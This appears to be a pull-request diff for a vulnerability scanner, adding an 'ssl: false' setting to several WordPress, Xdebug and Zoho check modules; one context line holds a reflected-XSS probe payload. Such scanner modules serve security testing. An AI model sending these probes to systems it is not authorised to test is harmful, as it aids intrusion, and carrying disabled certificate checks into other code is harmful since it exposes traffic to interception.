           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction"

--- a/modules/vuln/wp_xmlrpc_bruteforce.yaml
+++ b/modules/vuln/wp_xmlrpc_bruteforce.yaml
@@ -21,6 +21,7 @@ payloads:
           User-Agent: "{user_agent}"
           Content-Type: "text/xml"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/xmlrpc.php"

--- a/modules/vuln/wp_xmlrpc_dos.yaml
+++ b/modules/vuln/wp_xmlrpc_dos.yaml
@@ -20,6 +20,7 @@ payloads:
           User-Agent: "{user_agent}"
           Content-Type: "text/xml"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/xmlrpc.php"

--- a/modules/vuln/wp_xmlrpc_pingback.yaml
+++ b/modules/vuln/wp_xmlrpc_pingback.yaml
@@ -20,6 +20,7 @@ payloads:
           User-Agent: "{user_agent}"
           Content-Type: "text/xml"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/xmlrpc.php"

--- a/modules/vuln/x_powered_by.yaml
+++ b/modules/vuln/x_powered_by.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/x_xss_protection.yaml
+++ b/modules/vuln/x_xss_protection.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/xdebug_rce.yaml
+++ b/modules/vuln/xdebug_rce.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/zoho_cve_2021_40539.yaml
+++ b/modules/vuln/zoho_cve_2021_40539.yaml
@@ -26,6 +26,7 @@ payloads:
           Host: {target}
           Content-Type: application/x-www-form-urlencoded
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/./RestAPI/LogonCustomization"


### PR DESCRIPTION
this feature was removed in #593, now I added again but the `verify` key is now known as `ssl`.